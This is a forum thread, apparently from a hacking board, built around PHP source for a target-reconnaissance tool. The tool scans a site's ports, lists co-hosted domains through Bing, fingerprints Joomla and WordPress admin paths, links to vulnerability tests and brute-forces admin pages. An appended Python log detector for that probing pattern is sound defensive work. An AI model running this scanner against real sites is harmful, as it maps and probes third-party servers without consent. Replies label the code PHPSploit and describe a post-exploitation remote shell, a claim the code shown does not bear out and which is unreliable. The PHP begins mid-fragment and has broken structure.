<span style="float: right;"><table><tr><td>Verified: <span id="verified">0</span> / <span id="total">0</span></td><td><input type="submit" name="xploit_submit" value="Search !" align="right" /></td></tr><tr><td><br>Stalk3R@live.CoM | www.sec4ever.com</td></tr></table></span>

</form><br>


';
?>


</div>

<?php


echo '
<br>
</div> <!-- /tube -->
</div> <!-- /red -->
</td><td valign=top>
';
if($_POST['xploit_submit'])
{
echo '
<div class="green">
<div class="tube" id="rightcol">';

echo '
Infos about website:<br>
*******************/<br>


<table width=100% style="background: #222; border: 1px solid #111;">
<td>
<img src="http://open.thumbshots.org/image.pxf?url='.$_POST['xploit_url'].'">
</td>
<td>
<textarea style="width:100%;height:88px;background:#555;margin-left:-15px">If ROBOTS.TXT exist,you see it here
';
$url_robots = str_replace("http://", "", $_POST['xploit_url']);
$robots = 'http://'.$url_robots.'/robots.txt';
$affiche_robots = file_get_contents($robots);
echo $affiche_robots;

echo '</textarea></td></tr></table>
<br>
Ports scanner:<br>
*************/
<div class="tube" id="portbox">

<table width=100% style="background: #222; border: 1px solid #111;"><tr><td>
';
// Port scanner

$port = array("21", "23", "25", "80", "110", "139", "445", "1433", "1521", "1723", "3306", "3389", "5900", "8080");
$port_name = array("(FTP)", "(TELNET)", "(SMTP)", "(HTTP)", "(POP3)", "(NETBIOS-SSN)", "(MICROSOFT-DS)", "(MS-SQL-S)", "(NCUBE-LM)", "(PPTP)", "(MYSQL)", "(MS-WBT-SERVER)", "()", "(WEBCACHE)");

$site = $_POST['xploit_url'];
$site = str_replace("http://", "", $site);


$ip_target = gethostbyname("".$site."");

for($i=0;$i<12;$i++)
{
$fp = fsockopen($ip_target,$port[$i],$errno,$errstr,0.1);
if($fp)
{
echo "<font color=#ff0000>". $port_name[$i] ."</font> port " . $port[$i] . " <b>OPEN</b> on " . $ip_target . "<br>";
fclose($fp);
}
else
{
echo "<font color=#ff0000>". $port_name[$i] ."</font> port " . $port[$i] . " <b>CLOSED</b> on " . $ip_target . "<br>";
}
flush();
}

//-------------------------------------------
echo '
</td></table></div>
';

echo '
Found ones:<br />
***********/<br>';



echo '
</div> <!-- /tube -->
</div> <!-- /green -->

</td></tr></table>

<div class="yellow">
';


echo '
Websites on the server:<br>
*********************/<br>
';



if($_POST['xploit_submit'])
{

$dorkk = "ip:".$ip_target;

$pageNum = 0;
for($pageNum = 0; $pageNum < 10; $pageNum++)
{
$bing = file_get_contents("http://www.bing.com/search?q=".str_replace(" ","+",$dorkk)."&go=&filt=all&first=".$pageNum."");
if(!preg_match("/No results found for/",$bing))
{
preg_match_all("/<h3><a href=\"(.*?)\">/",$bing,$sites);
if(count($sites[1])==0)
{return false;}
for($i=0 ; $i < count($sites[1]);$i++)
{
$site2 = str_replace(array("http://","https://","www."),"",$sites[1][$i]);
$site2 = substr($site2,0,strpos($site2,"/",0));
if(!in_array($site2,$arrayy))
{

//Search for JOOMLA & WORDPRESS
$headers_joomla = @get_headers("http://".$site2."/administrator");
$headers_wordpress = @get_headers("http://".$site2."/wp-admin");

if(strpos($headers_joomla[0],'404') === false)
{
$joomla = "joomla";
$site3 = $site2." (JOOMLA) | <a href='#' class='testvuln".$joomla.''.$i."'>TEST VULNERABILITY</a>";
echo $site3. "<br>";
?>
<script>
//commentaudio
$('.testvuln<?php echo $joomla.''.$i;?>').live("click",function()
{
$('#showtest<?php echo $joomla.''.$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>');
$('#showtest<?php echo $joomla.''.$i;?>').load("adm.php?webvuln=<?php echo $site2;?>&what=<?php echo $joomla; ?>");

return false;
});
</script>
<div id="showtest<?php echo $joomla.''.$i;?>">
<p>
</p>
</div>
<?php
}
elseif(strpos($headers_wordpress[0],'404') === false)
{
$wordpress = "wordpress";
$site3 = $site2." (WORDPRESS) | <a href='#' class='testvuln".$wordpress.''.$i."'>TEST VULNERABILITY</a>";
echo $site3. "<br>";

?>
<script>
//commentaudio
$('.testvuln<?php echo $wordpress.''.$i;?>').live("click",function()
{
$('#showtest<?php echo $wordpress.''.$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>');
$('#showtest<?php echo $wordpress.''.$i;?>').load("adm.php?webvuln=<?php echo $site2;?>&what=<?php echo $wordpress; ?>");

return false;
});
</script>
<div id="showtest<?php echo $wordpress.''.$i;?>">
<p>
</p>
</div>



<?php
}
else
{
echo $site2. " | <a href='#' class='testvuln".$i."'>TEST VULNERABILITY</a><br>";
$site4 = str_replace("www.", "", $site2);
$site4 = str_replace("http://", "", $site2);
?>

<script>

$('.testvuln<?php echo $i;?>').live("click",function()
{
$('#showtest<?php echo "1".$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>');
$('#showtest<?php echo "1".$i;?>').load("adm.php?dork=<?php echo $site4;?>&setype=bing&page=1");
$('#showtest<?php echo "2".$i;?>').load("adm.php?dork=<?php echo $site4;?>&setype=google&page=1");


return false;
});
</script>
<div id="showtest<?php echo "1".$i;?>">
<p>
</p>
</div>

<div id="showtest<?php echo "2".$i;?>">
<p>
</p>
</div>


<?php
}
array_push($arrayy,$site2);
}

}
$pageNum += 10;
}

}
//$array = array_unique($uSites);
//for($i=0;$i<count($array);$i++){echo $array[$i]."<br />";}
}




echo '

</div>

<br clear="all" /><br />

<div class="blue">
<div class="tube" id="logbox">';



echo '
Admin page Finder: <br />
******************/<br />
</div> <!-- /tube -->
</div> <!-- /blue -->

</div> <!-- /wrapper -->
<br clear="all">';
}
}
function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
if($br == 1) $msg .= "<br />";
echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
if($stop == 1) exit;
@flush();@ob_flush();
}

// Variant of show() for port results; the original referenced $br, $msg and $stop, which are not parameters here
function showport($site, $port) {
echo "<script type=\"text/javascript\">insertcode('".$site."', '".$port."');</script>";
@flush();@ob_flush();
}
function check($x, $front=0) {
global $_POST,$site,$false;
if($front == 0) $t = $site.$x;
else $t = 'http://'.$x.'.'.$site.'/';
$headers = get_headers($t);
if (!eregi('200', $headers[0])) return 0;
$data = @file_get_contents($t);
if($_POST['xploit_404string'] == "") if($data == $false) return 0;
if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
return 1;
}





// --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
template();

if(!isset($_POST['xploit_url'])) die;
if($_POST['xploit_url'] == '') die;

$site = $_POST['xploit_url'];
$site = str_replace("http://", "", $site);
$site = "http://".$site;

if ($site[strlen($site)-1] != "/") $site .= "/";
if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
$list['end'] = str_replace("\r", "", $list['end']);
$list['front'] = str_replace("\r", "", $list['front']);
$pathes = explode("\n", $list['end']);
$frontpathes = explode("\n", $list['front']);
show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
$verificate = 0;
foreach($pathes as $path) {
show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
$verificate++; show($verificate, 0, 0, 'verified', 1);
if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
}
}
preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
if(substr($site, 0, 3) == "www") $site = substr($site, 4);
foreach($frontpathes as $frontpath) {
show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
$verificate++; show($verificate, 0, 0, 'verified', 1);
if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
}

}
}
?>
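The admin-page finder in the post above leaves a distinctive trace on the target's web server: a fetch of `/robots.txt`, probes of `/administrator` and `/wp-admin`, one request for an improbable 40-hex-character path (to learn what the server's "not found" page looks like), and then a burst of wordlist paths that mostly answer 404. The following detector, added here and not part of the posted tool, looks for exactly that pattern in Apache/nginx "combined" format access logs. The log lines, the IP addresses (RFC 5737 documentation ranges), the wordlist paths and the thresholds are all constructed for the illustration.

```python
"""Spot the probing pattern of the admin-page finder above in web server access logs.
Added example (not part of the posted tool): assumes Apache/nginx "combined" log format;
the log lines, addresses, wordlist and thresholds are constructed for illustration."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
# Paths the tool requests to fingerprint Joomla / WordPress before walking its wordlist.
CMS_PROBES = {"/administrator", "/administrator/", "/wp-admin", "/wp-admin/"}
# The tool first fetches an improbable path to learn what this server's "not found" page looks like.
BASELINE_RE = re.compile(r"/[0-9a-f]{40}-this_can-t_exist\.html$")


def parse_line(line):
    """Return a dict with ip, time, path, status, or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "time": datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
    }


def peak_in_window(times, window_seconds):
    """Largest number of events falling inside any window_seconds-long interval."""
    times = sorted(times)
    peak = start = 0
    for end in range(len(times)):
        while (times[end] - times[start]).total_seconds() > window_seconds:
            start += 1
        peak = max(peak, end - start + 1)
    return peak


def analyse(lines, window_seconds=60, not_found_threshold=10):
    """Map each suspicious client IP to what was observed about it."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)
    findings = {}
    for ip, recs in by_ip.items():
        cms = sorted({r["path"] for r in recs if r["path"] in CMS_PROBES})
        baseline = any(BASELINE_RE.search(r["path"]) for r in recs)
        peak = peak_in_window([r["time"] for r in recs if r["status"] == 404], window_seconds)
        reasons = []
        if len(cms) >= 2:
            reasons.append("CMS fingerprint probes: " + ", ".join(cms))
        if baseline:
            reasons.append("soft-404 baseline probe (long hex path)")
        if peak >= not_found_threshold:
            reasons.append(f"{peak} responses with status 404 within {window_seconds}s")
        if reasons:
            findings[ip] = {"cms_probes": cms, "baseline_probe": baseline,
                            "peak_404s": peak, "reasons": reasons}
    return findings


def _line(ip, second, path, status):
    # Constructed combined-format log line; only the seconds field varies.
    return (f'{ip} - - [10/Oct/2012:13:55:{second:02d} +0000] "GET {path} HTTP/1.1" '
            f'{status} 512 "-" "Mozilla/5.0"')


SCANNER = "198.51.100.7"  # constructed (RFC 5737 documentation range)
VISITOR = "203.0.113.5"   # constructed: an ordinary visitor who hits one stale link
WORDLIST = ["/admin/", "/admin.php", "/login/", "/manager/", "/cpanel/",
            "/adm/", "/webadmin/", "/admin_area/", "/moderator/", "/controlpanel/"]
SAMPLE_LOG = (
    [_line(SCANNER, 1, "/robots.txt", 200),
     _line(SCANNER, 2, "/administrator", 301),
     _line(SCANNER, 2, "/wp-admin", 404),
     _line(SCANNER, 3, "/d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html", 404)]
    + [_line(SCANNER, 4 + i, p, 404) for i, p in enumerate(WORDLIST)]
    + [_line(SCANNER, 15, "/administrator/", 200),
       _line(VISITOR, 5, "/", 200),
       _line(VISITOR, 6, "/about.html", 200),
       _line(VISITOR, 7, "/old-page.html", 404)]
)

if __name__ == "__main__":
    for ip, f in analyse(SAMPLE_LOG).items():
        print(ip)
        for r in f["reasons"]:
            print("  -", r)
```

The three signals are deliberately independent: the 404 burst catches any wordlist walker, the CMS probe pair catches the fingerprinting step even when the wordlist is short, and the baseline-path check is specific to scanners that, like this one, request a known-nonexistent page to calibrate soft-404 detection. A site that answers every path with 200 defeats the first signal, which is exactly why the tool calibrates; the other two still fire.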

Posted

I don't understand why you don't also include a description with the topic you create, so that all users know what it is about, both for better indexing and for understanding the topic at first sight, without having to search other sites for the same topic or additional information. Don't take it the wrong way, it's just a piece of advice that I consider essential on a forum.

Good luck.

PS: I have written before, and will keep writing, in topics like this one, where just a code of who knows how many hundreds of lines is thrown in, regardless of the sanctions I risk.

Posted (edited)

Do you know what a PHPSploit is?

Well, this is a PHPSploit source!

If you know what it means, then you know what it does, what it is used for and how it is used!

Edited by io.kent
Posted

Nice multi-tool.

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable of maintaining access to a compromised web server for privilege escalation purposes.
